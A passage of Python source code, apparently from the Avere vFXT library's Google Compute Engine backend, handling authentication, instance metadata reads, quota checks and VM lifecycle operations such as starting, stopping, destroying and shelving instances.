'n1-highcpu-16': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-32': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-64': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-96': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-2': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-ssd'},
'n1-highmem-4': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-8': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-16': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-32': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-64': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-96': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-1': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-ssd'},
'n1-standard-2': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-ssd'},
'n1-standard-4': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-8': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-16': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-32': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-64': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-96': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'custom-6-40960': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
}
MACHINE_TYPES = list(MACHINE_DEFAULTS.keys())
DEFAULTS_URL = "https://storage.googleapis.com/avere-dist/vfxtdefaults.json"
DEFAULT_SCOPES = ['https://www.googleapis.com/auth/compute',
'https://www.googleapis.com/auth/devstorage.full_control',
'https://www.googleapis.com/auth/userinfo.email']
S3TYPE_NAME = 'GOOGLE'
COREFILER_TYPE = 's3'
COREFILER_CRED_TYPE = 's3'
INSTANCENAME_RE = re.compile(r'[a-z]([-a-z0-9]*[a-z0-9])?$')
GSURL_RE = re.compile(r'gs://([^\/]*)/(.*)$')
STORAGE_CLASSES = ['STANDARD', 'NEARLINE', 'DURABLE_REDUCED_AVAILABILITY', 'MULTI_REGIONAL', 'REGIONAL', 'COLDLINE']
ENDPOINT_TEST_HOSTS = ['www.googleapis.com']
DISABLE_SSL_CERTIFICATE_VALIDATION = False
OFFLINE_DEFAULTS = {
'version': '1',
'clustermanager': {
'maxNumNodes': 20,
'instanceTypes': ['n1-highmem-8', 'n1-highmem-32'],
'cacheSizes': [
{'label': '250-persistent-SSD', 'size': 250, 'type': 'pd-ssd'},
{'label': '375-local-SSD', 'size': 375, 'type': 'local-ssd'},
{'label': '1000-persistent-SSD', 'size': 1000, 'type': 'pd-ssd'},
{'label': '1500-local-SSD', 'size': 1500, 'type': 'local-ssd'},
{'label': '3000-local-SSD', 'size': 3000, 'type': 'local-ssd'},
{'label': '4000-persistent-SSD', 'size': 4000, 'type': 'pd-ssd'},
{'label': '8000-persistent-SSD', 'size': 8000, 'type': 'pd-ssd'}
]
}
}
DEFAULT_CLUSTER_NETWORK_RANGE = '172.16.0.0/12'
ALLOCATE_INSTANCE_ADDRESSES = True
def __init__(self, network_id, zone, client_email=None, project_id=None,
key_file=None, key_data=None, access_token=None, s3_access_key=None,
s3_secret_access_key=None, private_range=None, proxy_uri=None,
no_connection_test=False, subnetwork_id=None, on_instance=False,
use_environment_for_auth=False, skip_load_defaults=False,
network_project_id=None, source_address=None):
'''Constructor
This performs an initial connection test and downloads the default
data.
Either a base64 encoded key string or the path to the service account
P12/JSON key file must be provided.
If the JSON key file is provided, client_email, project_id, and key are
read from it. Otherwise client_email and project_id must be specified.
If an access token is provided, that will be used in place of the
client_email + key/key_file. This is only useful if running on a
GCE instance.
Arguments:
network_id (str): network ID
zone (str or []): one or more zones names
client_email (str, optional): client email
project_id (str, optional): project ID
key_file (str, optional): file path to P12/JSON key file
access_token (str, optional): existing access token
private_range (str, optional): private address range (cidr)
subnetwork_id (str, optional): subnetwork ID
proxy_uri (str, optional): URI of proxy resource (e.g. http://user:pass@172.16.16.20:8080)
no_connection_test (bool, optional): skip connection test
skip_load_defaults (bool, optional): do not fetch defaults
network_project_id (str, optional): Project ID that owns the network (if outside current project)
'''
super(Service, self).__init__()
self.client_email = client_email
self.key_file = key_file
self.key_data = key_data
self.access_token = access_token
self.project_id = project_id
self.zones = zone if isinstance(zone, list) else [zone]
self.network_id = network_id
self.network_project_id = network_project_id
self.s3_access_key = s3_access_key
self.s3_secret_access_key = s3_secret_access_key
self.private_range = private_range
self.subnetwork_id = subnetwork_id
self.proxy_uri = proxy_uri
self.on_instance = on_instance
self.use_environment_for_auth = use_environment_for_auth
self.source_address = source_address
if not any([key_file, key_data, access_token, use_environment_for_auth]):
raise vFXTConfigurationException("You must provide a keyfile or auth token")
if self.key_data:
try:
self.client_email = self.key_data['client_email']
self.project_id = self.key_data['project_id']
except KeyError:
raise vFXTConfigurationException("Invalid key data: {}".format(self.key_data))
elif self.key_file and self.key_file.endswith('.json'):
with open(self.key_file) as f:
log.debug("Reading key data from {}".format(self.key_file))
key_data = f.read()
self.key_data = json.loads(key_data)
try:
self.client_email = self.key_data['client_email']
self.project_id = self.key_data['project_id']
except KeyError:
raise vFXTConfigurationException("Invalid key file: {}".format(self.key_file))
if not use_environment_for_auth:
if not all([self.client_email, self.project_id]):
raise vFXTConfigurationException("You must provide a keyfile or specify client_email and project_id")
# emit third party library version information
log.debug("Using googleapiclient version %s", pkg_resources.get_distribution("google-api-python-client").version)
log.debug("Using oauth2client version %s", pkg_resources.get_distribution("oauth2client").version)
if self.proxy_uri:
self.set_proxy(self.proxy_uri)
# check if we have a Xpn host project
try:
self.network_project_id = self.network_project_id or self._get_network_project()
except vFXTServiceTimeout as e:
raise_from(vFXTServiceConnectionFailure(e), e)
if not no_connection_test:
self.connection_test()
if self.subnetwork_id:
subnetwork_names = [_['name'] for _ in self._get_subnetworks()]
if self.subnetwork_id not in subnetwork_names:
err = "Invalid subnetwork: {} (available {})".format(self.subnetwork_id, ','.join(subnetwork_names))
raise vFXTConfigurationException(err)
if not skip_load_defaults:
log.debug("Fetching defaults from {}".format(self.DEFAULTS_URL))
load_defaults(self)
@classmethod
def get_instance_data(cls, source_address=None):
'''Detect the instance data
Arguments:
source_address (str, optional): source address for data request
This only works when running on a GCE instance.
This is a service specific data structure.
Well known keys that can be expected across services:
machine_type (str): machine/instance type
account_id (str): account identifier
service_id (str): unique identifier for this host
ssh_keys ([str]): ssh keys
cluster_cfg (str): cluster configuration
https://cloud.google.com/compute/docs/metadata
'''
if source_address:
source_address = (source_address, 0)
connection_host = cls.GCE_INSTANCE_HOST
connection_port = http.client.HTTP_PORT
conn = http.client.HTTPConnection(connection_host, connection_port, source_address=source_address, timeout=CONNECTION_TIMEOUT)
instance_data = {}
headers = {'Metadata-Flavor': 'Google'}
attrs = {
'project-id': '/computeMetadata/v1/project/project-id',
'numeric-project-id': '/computeMetadata/v1/project/numeric-project-id',
'zone-id': '/computeMetadata/v1/instance/zone',
'network-id': '/computeMetadata/v1/instance/network-interfaces/0/network',
'ip': '/computeMetadata/v1/instance/network-interfaces/0/ip',
'access-token': '/computeMetadata/v1/instance/service-accounts/default/token',
'scopes': '/computeMetadata/v1/instance/service-accounts/default/scopes',
'email': '/computeMetadata/v1/instance/service-accounts/default/email',
'hostname': '/computeMetadata/v1/instance/hostname',
'tags': '/computeMetadata/v1/instance/tags',
'id': '/computeMetadata/v1/instance/id',
'machine-type': '/computeMetadata/v1/instance/machine-type',
'metadata_keys': '/computeMetadata/v1/instance/attributes/', # gives list b/c of trailing /
}
try:
for k, v in viewitems(attrs):
conn.request('GET', '{}'.format(v), headers=headers)
response = conn.getresponse()
if response.status == 200:
content = response.read().decode()
try:
instance_data[k] = json.loads(content)
except ValueError as e:
instance_data[k] = content
instance_data['metadata'] = {}
for key in [_ for _ in instance_data['metadata_keys'].split('\n') if _]: # filter empty entries
path = '{}{}'.format(attrs['metadata_keys'], key)
conn.request('GET', '{}'.format(path), headers=headers)
response = conn.getresponse()
if response.status == 200:
content = response.read().decode()
try:
instance_data['metadata'][key] = json.loads(content)
except ValueError as e:
instance_data['metadata'][key] = content
if 'access-token' in instance_data:
instance_data['access_token'] = instance_data['access-token']['access_token']
instance_data['expires_in'] = instance_data['access-token']['expires_in']
instance_data['token_expires'] = int(time.time()) + instance_data['expires_in'] - 120
else: # try and support cloud shell
# XXX right now this doesn't work... missing proper network-id (sets to default)
try:
s = socket.socket()
s.connect(('localhost', int(os.getenv('DEVSHELL_CLIENT_PORT', '0'))))
s.sendall('2\n[]'.encode())
data = json.loads(s.recv(1024).decode().split('\n')[1])
instance_data['email'] = data[0]
instance_data['project-id'] = data[1]
instance_data['access_token'] = data[2]
instance_data['token_expires'] = int(data[3]) - 120
except Exception as e:
log.error('Failed to extract configuration for cloud shell: {}'.format(e))
raise
instance_data['machine_type'] = instance_data['machine-type'].split('/')[-1]
instance_data['account_id'] = instance_data['numeric-project-id']
instance_data['service_id'] = instance_data['hostname'].split('.')[0]
instance_data['ssh_keys'] = []
if 'sshKeys' in instance_data['metadata']: # deprecated
# prune username: from the key data
instance_data['ssh_keys'] = [_.split(':')[-1] for _ in instance_data['metadata']['sshKeys'].split('\n')]
if 'ssh-keys' in instance_data['metadata']:
# prune username: from the key data
instance_data['ssh_keys'].extend([_.split(':')[-1] for _ in instance_data['metadata']['ssh-keys'].split('\n')])
if 'cluster_cfg' not in instance_data['metadata']:
instance_data['cluster_cfg'] = ''
else:
instance_data['cluster_cfg'] = instance_data['metadata']['cluster_cfg'].replace('\\n', '\n').replace(' ', '\n').replace('_', '\n').replace('@', '=')
instance_data['cluster_cfg'] = base64.b64decode(instance_data['cluster_cfg'].encode('utf-8')).decode()
except Exception as e:
raise_from(vFXTServiceMetaDataFailure('Unable to read instance metadata: {}'.format(e)), e)
finally:
conn.close()
return instance_data
@classmethod
def environment_init(cls, **kwargs):
'''Init an GCE service object using the local environment credentials
Arguments:
**kwargs: arguments passed through to __init__
'''
kwargs['use_environment_for_auth'] = True
return Service(**kwargs)
@classmethod
def on_instance_init(cls, source_address=None, no_connection_test=False, proxy_uri=None, **kwargs): #pylint: disable=arguments-differ
'''Init a GCE service object from instance metadata
Arguments:
source_address (str, optional): source address for data request
no_connection_test (bool, optional): skip connection tests, defaults to False
proxy_uri (str, optional): URI of proxy resource
skip_load_defaults (bool, optional): do not fetch defaults
This is only meant to be called on instance. Otherwise will
raise a vFXTConfigurationException exception.
'''
instance_data = cls.get_instance_data(source_address=source_address)
log.debug('Read instance data: {}'.format(instance_data))
if source_address:
Service.CONTROL_ADDR = source_address
class HTTPSConnectionFromSource(httplib2.HTTPSConnectionWithTimeout):
"""
An override of httplib2's HTTPSConnectionWithTimeout that forces
connections to come from our controlAddr. __init__ is essentially
a copy of the httplib2 version.
"""
def __init__(self, host, port=None, key_file=None, cert_file=None, #pylint: disable=unused-argument
strict=None, timeout=None, proxy_info=None, #pylint: disable=unused-argument
ca_certs=None, disable_ssl_certificate_validation=False, **other_kwargs):
log.debug("Making connection to {} from {}".format(host, Service.CONTROL_ADDR))
http.client.HTTPSConnection.__init__(self, host, port=port,
key_file=key_file,
cert_file=cert_file, timeout=timeout,
source_address=(Service.CONTROL_ADDR, 0))
self.timeout = timeout
self.proxy_info = proxy_info
if ca_certs is None:
ca_certs = httplib2.CA_CERTS
self.ca_certs = ca_certs
self.disable_ssl_certificate_validation = disable_ssl_certificate_validation
def connect(self):
"Connect to a host on a given (SSL) port."
if self.proxy_info and self.proxy_info.isgood():
sock = httplib2.socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
sock.setproxy(self.proxy_info.proxy_type, self.proxy_info.proxy_host, self.proxy_info.proxy_port, self.proxy_info.proxy_rdns, self.proxy_info.proxy_user, self.proxy_info.proxy_pass)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if self.source_address:
sock.bind(self.source_address)
if self.timeout:
sock.settimeout(float(self.timeout))
sock.connect((self.host, self.port))
# XXX set ssl_version in ssl.wrap_socket call
self.sock = ssl.wrap_socket(sock, keyfile=self.key_file, certfile=self.cert_file)
httplib2.SCHEME_TO_CONNECTION['https'] = HTTPSConnectionFromSource
# check scopes for one of the following
required_scopes = ['https://www.googleapis.com/auth/compute', 'https://www.googleapis.com/auth/cloud-platform']
if not any([_ in required_scopes for _ in instance_data['scopes'].split('\n')]):
raise vFXTConfigurationException("Compute R/W or Full Access required for this instance")
try:
project_id = instance_data['project-id']
zone_id = instance_data['zone-id'].split('/')[-1]
network_id = instance_data['network-id'].split('/')[-1]
network_project_id = instance_data['network-id'].split('/')[1]
access_token = instance_data['access_token']
client_email = instance_data['email']
srv = Service(network_id=network_id, client_email=client_email,
project_id=project_id, zone=zone_id,
access_token=access_token, no_connection_test=no_connection_test,
proxy_uri=proxy_uri, on_instance=True, skip_load_defaults=kwargs.get('skip_load_defaults'),
network_project_id=network_project_id, source_address=source_address)
srv.local.instance_data = instance_data
region = srv._zone_to_region(zone_id)
# translate our network project id into a name
srv.network_project_id = srv._get_network()['selfLink'].split('/')[-4]
# no subnetwork in metadata... figure out which subnetwork owns our address
subnetworks = srv._get_subnetworks(region)
if subnetworks:
for subnetwork in subnetworks:
if Cidr(subnetwork['ipCidrRange']).contains(instance_data['ip']):
srv.subnetwork_id = subnetwork['name']
if not srv.subnetwork_id:
srv.subnetwork_id = subnetworks[0]['name']
return srv
except (vFXTServiceFailure, vFXTServiceConnectionFailure) as e:
raise
except Exception as e:
raise_from(vFXTConfigurationException(e), e)
def connection_test(self):
'''Connection test
Raises: vFXTConfigurationException
'''
log.debug("Performing connection test")
try:
if not self.proxy: # proxy environments may block outgoing name resolution
self.dns_check()
conn = self.connection(retries=0)
resp = conn.projects().get(project=self.project_id).execute()
for q in resp['quotas']:
if q['usage'] / q['limit'] > 0.9:
log.warning("QUOTA ALERT: Using {} of {} {}".format(int(q['usage']), int(q['limit']), q['metric']))
except Exception as e:
if isinstance(e, IOError):
log.exception(e)
raise_from(vFXTServiceConnectionFailure("Failed to establish connection to service: {}".format(e)), e)
def check(self, percentage=0.6, instances=0, machine_type=None, data_disk_type=None, data_disk_size=None, data_disk_count=None): #pylint: disable=arguments-differ
'''Check quotas and API access
Arguments:
percentage (float, optional): percentage as a decimal
instances (int, optional): Number of planned for instances to account for
machine_type (str, optional): Machine type
data_disk_type (str, optional): Data disk type
data_disk_size (int, optional): Data disk size
data_disk_count (int, optional): Data disk count
'''
core_count = 0
if machine_type and instances:
machine_type_cores = 1
try:
if machine_type.startswith('custom-'):
machine_type_cores = int(machine_type.split('-')[-2])
else:
machine_type_cores = int(machine_type.split('-')[-1])
except ValueError: pass
core_count = instances * machine_type_cores
ssd_count = 0
local_ssd_count = 0
if all([data_disk_type, data_disk_count, data_disk_size]):
if data_disk_type == 'local-ssd':
local_ssd_count = data_disk_count * data_disk_size
else:
ssd_count = data_disk_count * data_disk_size
conn = self.connection()
project_quotas = conn.projects().get(project=self.project_id).execute()['quotas']
for q in project_quotas:
usage = int(q.get('usage') or 0)
limit = int(q.get('limit') or 0)
metric = q.get('metric')
if not metric:
log.error(q)
continue
metric = metric.lower().capitalize().replace('_', ' ')
if limit and float(usage) / limit > percentage:
log.warning("QUOTA ALERT: Using {} of {} {} for the project".format(usage, limit, metric))
else:
log.debug("Using {} of {} {} for the project".format(usage, limit, metric))
region = self._zone_to_region(self.zones[0])
region_quotas = conn.regions().get(project=self.project_id, region=region).execute()['quotas']
for q in region_quotas:
usage = int(q.get('usage') or 0)
limit = int(q.get('limit') or 0)
metric = q.get('metric')
if not metric:
continue
if metric == 'CPUS':
usage += core_count
if metric == 'SSD_TOTAL_GB':
usage += ssd_count
if metric == 'LOCAL_SSD_TOTAL_GB':
usage += local_ssd_count
metric = metric.lower().capitalize().replace('_', ' ')
if limit and float(usage) / limit > percentage:
log.warning("QUOTA ALERT: Using {} of {} {} for the region".format(usage, limit, metric))
else:
log.debug("Using {} of {} {} for the region".format(usage, limit, metric))
def _auth_http(self, scopes=None):
'''Simple wrapper for the HTTP object credential authorization
Do not call this directly, use connection() instead.
Arguments:
scopes ([str], optional): list of scopes to request, defaults to DEFAULT_SCOPES
'''
creds = None
scopes = scopes or self.DEFAULT_SCOPES
if self.access_token:
from oauth2client.client import AccessTokenCredentials
# we check for access_token presence but use the threading.local copy
creds = AccessTokenCredentials(self.local.access_token, 'vFXT UserAgent/0.1')
elif self.use_environment_for_auth:
creds = oauth2client.client.GoogleCredentials.get_application_default()
else:
try:
from oauth2client.service_account import ServiceAccountCredentials
if self.key_data:
creds = ServiceAccountCredentials.from_json_keyfile_dict(self.key_data, scopes)
elif self.key_file.endswith('.p12'):
creds = ServiceAccountCredentials.from_p12_keyfile(self.client_email, self.key_file, scopes)
else:
raise vFXTConfigurationException("Unknown key file type: {}".format(self.key_file))
except Exception as e:
log.debug('Failed importing oauth2client.service_account (oauth2client 2.x), falling back to oauth2client 1.x: {}'.format(e))
with open(self.key_file) as f:
key = f.read()
if self.key_file.endswith('.json'):
key = json.loads(key)['private_key']
from oauth2client.client import SignedJwtAssertionCredentials
creds = SignedJwtAssertionCredentials(self.client_email, key, scopes)
proxy = None
if self.proxy_uri:
proxy = httplib2.proxy_info_from_url(self.proxy_uri)
else:
try:
proxy = httplib2.proxy_info_from_environment()
except Exception as e:
log.debug("httplib2.proxy_info_from_environment(): {}".format(e))
# maybe set this for those proxies that don't support CONNECT?
# proxy.proxy_type = httplib2.socks.PROXY_TYPE_HTTP_NO_TUNNEL
http_transport = httplib2.Http(proxy_info=proxy,
disable_ssl_certificate_validation=self.DISABLE_SSL_CERTIFICATE_VALIDATION, timeout=CONNECTION_TIMEOUT)
return creds.authorize(http_transport)
def connection(self, connection_type='compute', version='v1', retries=CONNECTION_TIMEOUT, scopes=None): #pylint: disable=arguments-differ
'''Connection factory, returns a new connection or thread local copy
Arguments:
connection_type (str, optional): connection type (compute, storage)
version (str, optional): currently unused
retries (int, optional): number of retries, default to vFXT.service.CONNECTION_TIMEOUT
scopes ([str], optional): list of scopes to request, defaults to DEFAULT_SCOPES
'''
try:
if self.local.instance_data['token_expires'] < int(time.time()):
log.debug("Access token expired, forcing refresh")
self.local.connections = {}
except Exception:
pass
if not hasattr(self.local, 'connections'):
self.local.connections = {}
connection_sig = '{}_{}'.format(connection_type, version)
if not self.local.connections.get(connection_sig, False):
if self.access_token:
self.local.instance_data = self.get_instance_data(source_address=self.source_address)
self.local.access_token = self.local.instance_data['access_token']
log.debug("Creating new {} connection object".format(connection_type))
connection_attempts = 0
while True:
try:
self.local.connections[connection_sig] = googleapiclient.discovery.build(connection_type, version, http=self._auth_http(scopes=scopes))
break
except Exception as e:
if connection_attempts == retries:
raise_from(vFXTServiceConnectionFailure("Failed to establish connection to service: {}".format(e)), e)
log.debug("Retrying failed connection attempt: {}".format(e))
connection_attempts += 1
time.sleep(backoff(connection_attempts))
return self.local.connections[connection_sig]
def find_instances(self, search=None, all_regions=True): #pylint: disable=arguments-differ
'''Returns all or filtered list of instances
Arguments:
search (str, optional): search query
all_regions (bool, optional): search all regions, not just the current
Search examples:
field [ne|eq] expression
'name eq instance-name'
'name eq (name1|name2|name3)'
'name eq prefix.*$'
'''
conn = self.connection()
instances = []
for zone in self._zone_names(all_regions):
page_token = None
while True:
try: # sometimes we can see a region/zone before we can inspect it
r = _gce_do(conn.instances().list, project=self.project_id, filter=search, zone=zone, pageToken=page_token)
if r and 'items' in r:
instances.extend(r['items'])
if r and 'nextPageToken' in r:
page_token = r['nextPageToken']
if not r or 'nextPageToken' not in r:
break
except Exception:
break
return instances
def get_instances(self, instance_ids, all_regions=True): #pylint: disable=arguments-differ
'''Returns a list of instances with the given instance ID list
Arguments:
instance_ids ([str]): list of instance id strings
all_regions (bool, optional): search all regions, not just the current
Returns:
[objs]: list of backend instance objects
'''
id_str = '|'.join(instance_ids)
search = 'name eq {}'.format(id_str)
conn = self.connection()
instances = []
for zone in self._zone_names(all_regions):
try: # sometimes we can see a region/zone before we can inspect it
r = _gce_do(conn.instances().list, project=self.project_id, filter=search, zone=zone)
if r and 'items' in r:
instances.extend(r['items'])
except Exception:
pass
return instances
def get_instance(self, instance_id, all_regions=True): #pylint: disable=arguments-differ
'''Get a specific instance by instance ID
Arguments:
instance_id (str)
all_regions (bool, optional): search all regions, not just the current
Returns:
obj or None
'''
conn = self.connection()
for zone in self._zone_names(all_regions):
try: # sometimes we can see a region/zone before we can inspect it
return _gce_do(conn.instances().get, project=self.project_id, instance=instance_id, zone=zone)
except Exception:
pass
return None
def wait_for_status(self, instance, status, retries=ServiceBase.WAIT_FOR_STATUS):
'''Poll on a given instance for status
Arguments:
instance (obj): backend instance object
status (str): status string to watch for
retries (int, optional): number of retries
Raises: vFXTServiceTimeout
'''
s = '...' # in case our instance is not yet alive
errors = 0
while status != s:
if retries % 10 == 0: # rate limit
log.debug("Waiting for status: {} != {}".format(s, status))
time.sleep(self.POLLTIME)
try:
instance = self.refresh(instance)
s = self.status(instance)
except Exception as e:
log.debug('Ignored: {}'.format(e))
errors += 1
time.sleep(backoff(errors))
retries -= 1
if retries == 0:
raise vFXTServiceTimeout("Timed out waiting for {} on {}".format(status, instance['name']))
def _wait_for_operation(self, response, msg='operation to complete', retries=ServiceBase.WAIT_FOR_OPERATION, op_type='zoneOperations', zone=None):
'''Wait for an operation to complete by polling the response
Arguments:
response (obj): response object from a prior service query
msg (str, optional): string to debug log for this operation
retries (int, optional): number of retries
op_type (str, optional): zoneOperations, globalOperations, ...
Raises: vFXTServiceFailure
'''
conn = self.connection()
op = conn.__getattribute__(op_type)
errors = 0
while response['status'] != 'DONE':
try:
time.sleep(self.POLLTIME)
if retries % 10 == 0:
log.debug("Waiting for {}: {}".format(msg, response['status']))
operation = response['name']
args = {'project': self.project_id, 'operation': operation}
if op_type == 'zoneOperations':
args['zone'] = zone or self.zones[0]
response = _gce_do(op().get, **args)
except googleapiclient.errors.HttpError as e:
if int(e.resp['status']) < 500:
if 'httpErrorMessage' in response:
raise_from(vFXTServiceFailure("{}: {}".format(response['httpErrorMessage'], response['error']['errors'][0]['message'])), e)
raise_from(vFXTServiceFailure(e), e)
errors += 1
time.sleep(backoff(errors))
retries -= 1
if retries == 0:
raise vFXTServiceTimeout("Failed waiting for {}".format(msg))
if 'httpErrorMessage' in response:
log.debug("response {}".format(response))
raise vFXTServiceFailure("{}: {}".format(response['httpErrorMessage'], response['error']['errors'][0]['message']))
def can_stop(self, instance):
''' Some instance configurations cannot be stopped. Check if this is one.
Arguments:
instance: backend instance
'''
if 'SCRATCH' in [d['type'] for d in instance['disks']]:
raise vFXTConfigurationException("Cannot stop instance {} with local-ssd disks".format(self.name(instance)))
return True
def stop(self, instance, wait=ServiceBase.WAIT_FOR_STOP):
'''Stop an instance
Arguments:
instance: backend instance
'''
if not self.can_stop(instance):
raise vFXTConfigurationException("Node configuration prevents them from being stopped")
log.info("Stopping instance {}".format(self.name(instance)))
conn = self.connection()
zone = instance['zone'].split('/')[-1]
response = _gce_do(conn.instances().stop, project=self.project_id, zone=zone, instance=instance['name'])
log.debug(response)
self.wait_for_status(instance, self.OFF_STATUS, retries=wait)
def start(self, instance, wait=ServiceBase.WAIT_FOR_START):
'''Start an instance
Arguments:
instance: backend instance
wait (int): wait time
'''
log.info("Starting instance {}".format(self.name(instance)))
conn = self.connection()
zone = instance['zone'].split('/')[-1]
response = _gce_do(conn.instances().start, project=self.project_id, zone=zone, instance=instance['name'])
log.debug(response)
self.wait_for_status(instance, self.ON_STATUS, retries=wait)
def restart(self, instance, wait=ServiceBase.WAIT_FOR_RESTART):
'''Restart an instance
Arguments:
instance: backend instance
wait (int): wait time
'''
if not self.can_stop(instance):
raise vFXTConfigurationException("Node configuration prevents them from being restarted")
log.info("Restarting instance {}".format(self.name(instance)))
# GCE does not have a reboot option, only reset (which is not what we want)
self.stop(instance)
self.start(instance)
def destroy(self, instance, wait=ServiceBase.WAIT_FOR_DESTROY, keep_root_disk=False): #pylint: disable=arguments-differ
'''Destroy an instance
Arguments:
instance: backend instance
wait (int): wait time
keep_root_disk (bool, optional): keep the root disk
'''
conn = self.connection()
zone = instance['zone'].split('/')[-1]
root_disk = None
if keep_root_disk:
root_disks = [d for d in instance['disks'] if 'boot' in d and d['boot']]
if not root_disks:
raise vFXTServiceFailure("Failed to find root disk")
root_disk = root_disks[0]
self._disable_disk_auto_delete(instance, root_disk['deviceName'])
log.info("Destroying instance {}".format(self.name(instance)))
response = _gce_do(conn.instances().delete, project=self.project_id, zone=zone, instance=instance['name'])
# we wait because we cannot destroy resources still attached to the instance
self._wait_for_operation(response, msg='instance {} to be destroyed'.format(instance['name']), retries=wait, zone=zone)
for d in instance['disks']:
# skip our root if we want to keep it
if root_disk and d['deviceName'] == root_disk['deviceName']:
continue
try: # need to delete any leftover disks
resp = _gce_do(conn.disks().delete, project=self.project_id, zone=zone, disk=d['deviceName'])
self._wait_for_operation(resp, msg='disk to be deleted', zone=zone)
except Exception:
pass
expr = "nextHopInstance eq .*/{}$".format(instance['name'])
routes = _gce_do(conn.routes().list, project=self.network_project_id, filter=expr)
if not routes or 'items' not in routes:
return
for route in routes['items']:
try: # need to delete any leftover routes
resp = _gce_do(conn.routes().delete, project=self.network_project_id, route=route['name'])
self._wait_for_operation(resp, msg='route to be deleted', zone=zone)
except Exception:
pass
def is_on(self, instance):
'''Return True if the instance is currently on
Arguments:
instance: backend instance
'''
return instance['status'] != self.OFF_STATUS
def is_off(self, instance):
'''Return True if the instance is currently off
Arguments:
instance: backend instance
'''
return instance['status'] == self.OFF_STATUS
def is_shelved(self, instance):
'''Return True if the instance is currently shelved
Arguments:
instance: backend instance
'''
try:
metadata = instance['metadata']['items']
return 'shelved' in [v for opts in metadata for v in opts.values()]
except Exception:
return False
def name(self, instance):
'''Returns the instance name (may be different from instance id)
Arguments:
instance: backend instance
'''
return instance['name']
def instance_id(self, instance):
'''Returns the instance id (may be different from instance name)
Arguments:
instance: backend instance
'''
return instance['name']
def status(self, instance):
'''Return the instance status
Arguments:
instance: backend instance
'''
return instance['status']
def refresh(self, instance):
'''Refresh the instance from the Google backend
Arguments:
instance: backend instance
'''
i = self.get_instance(instance['name'])
if not i:
raise vFXTConfigurationException("Failed to find instance: {}".format(instance['name']))
return i
def ip(self, instance):
'''Return the primary IP address of the instance
Arguments:
instance: backend instance
'''
try:
return instance['networkInterfaces'][0]['networkIP']
except Exception:
log.error("Unable to find first networkInterface networkIP in {}".format(instance))
def fqdn(self, instance): # XXX revisit
'''Provide the fully qualified domain name of the instance
Arguments:
instance: backend instance
'''
name = instance['name']
return "{}.c.{}.internal".format(name, self.project_id)
def can_shelve(self, instance):
''' Some instance configurations cannot be shelved. Check if this is one.
Arguments:
instance: backend instance
'''
if 'SCRATCH' in [d['type'] for d in instance['disks']]:
log.error("Cannot shelve {} with local-ssd disks".format(instance['name']))
return False
return True
def shelve(self, instance):
''' shelve the instance; shut it down, detach and delete
all non-root block devices
Arguments:
instance: backend instance
Raises: vFXTServiceFailure
'''
conn = self.connection()
zone = instance['zone'].split('/')[-1]
if not self.can_shelve(instance):
raise vFXTConfigurationException("{} configuration prevents shelving".format(self.name(instance)))
if self.is_shelved(instance):
raise vFXTConfigurationException("{} is already shelved".format(self.name(instance)))
if self.is_on(instance):
self.stop(instance)
instance = self.refresh(instance)
disks = instance['disks']
non_root_disks = [d for d in disks if 'boot' not in d or not d['boot']]
if not non_root_disks:
log.info("No non-root volumes for instance {}, already shelved?".format(instance['name']))
return
log.debug("Found non-root volumes: {}".format(non_root_disks))
disk_srv = conn.disks()
errors = ShelveErrors()
detach_failed = []
disk_size = None
disk_type = None
for nrd in non_root_disks:
name = nrd['source'].split('/')[-1]
data = _gce_do(disk_srv.get, project=self.project_id, zone=zone, disk=name)
